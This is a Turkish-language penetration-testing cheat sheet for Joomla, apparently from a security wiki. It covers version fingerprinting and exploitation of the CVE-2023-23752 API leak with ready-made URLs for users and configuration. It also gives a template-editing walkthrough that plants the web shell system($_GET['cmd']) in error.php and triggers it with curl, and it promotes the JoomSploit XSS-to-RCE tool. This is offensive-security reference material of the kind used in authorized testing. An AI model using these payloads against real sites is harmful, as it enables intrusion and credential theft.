Joomla
Joomla İstatistikleri
Joomla, Joomla kurulumlarında kullanılan Joomla, PHP ve veritabanı sürümleri ile sunucu işletim sistemlerinin dağılımı gibi bazı anonim kullanım istatistiklerini toplar. Bu veriler, kamuya açık API aracılığıyla sorgulanabilir.
Enumeration
Discovery/Footprinting
meta'yı kontrol et
robots.txt
README.txt
Versiyon
/administrator/manifests/files/joomla.xml dosyasında versiyonu görebilirsiniz.
/language/en-GB/en-GB.xml dosyasında Joomla'nın versiyonunu alabilirsiniz.
plugins/system/cache/cache.xml dosyasında yaklaşık bir versiyonu görebilirsiniz.
Otomatik
API Kimlik Doğrulaması Olmadan Bilgi Sızdırma:
4.0.0 ile 4.2.7 arasındaki sürümler, kimlik doğrulaması olmadan bilgi sızdırma (CVE-2023-23752) açığına sahiptir ve bu, kimlik bilgilerini ve diğer bilgileri dökebilir.
Kullanıcılar:
http://<host>/api/v1/users?public=true
Konfigürasyon Dosyası:
http://<host>/api/index.php/v1/config/application?public=true
MSF Modülü: scanner/http/joomla_api_improper_access_checks
veya ruby script: 51334
Kaba Kuvvet
Giriş bilgilerini kaba kuvvetle denemek için bu script'i kullanabilirsiniz.
RCE
Eğer admin kimlik bilgilerini elde etmeyi başardıysanız, RCE elde etmek için içine bir PHP kodu parçası ekleyerek RCE yapabilirsiniz. Bunu şablonu özelleştirerek yapabiliriz.
Configuration
altında sol alttaTemplates
üzerine tıklayın ve şablonlar menüsünü açın.Bir şablon adına tıklayın.
Template
sütun başlığı altındaprotostar
seçelim. Bu biziTemplates: Customise
sayfasına götürecek.Son olarak, sayfa kaynağını açmak için bir sayfaya tıklayabilirsiniz.
error.php
sayfasını seçelim. Kod yürütmek için bir PHP tek satır ekleyeceğiz:system($_GET['cmd']);
Kaydet ve Kapat
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
XSS'den RCE'ye
JoomSploit: Joomla Sömürü Scripti, XSS'yi RCE veya Diğer Kritik Güvenlik Açıklarına Yükseltir. Daha fazla bilgi için bu gönderiyi kontrol edin. Joomla Sürümleri 5.X.X, 4.X.X ve 3.X.X için destek sağlar ve şunları yapmanıza olanak tanır:
Yetki Yükseltme: Joomla'da bir kullanıcı oluşturur.
(RCE) Yerleşik Şablonları Düzenleme: Joomla'daki Yerleşik Şablonları düzenler.
(Özel) Özel Sömürü: Üçüncü Taraf Joomla Eklentileri için Özel Sömürü.
Last updated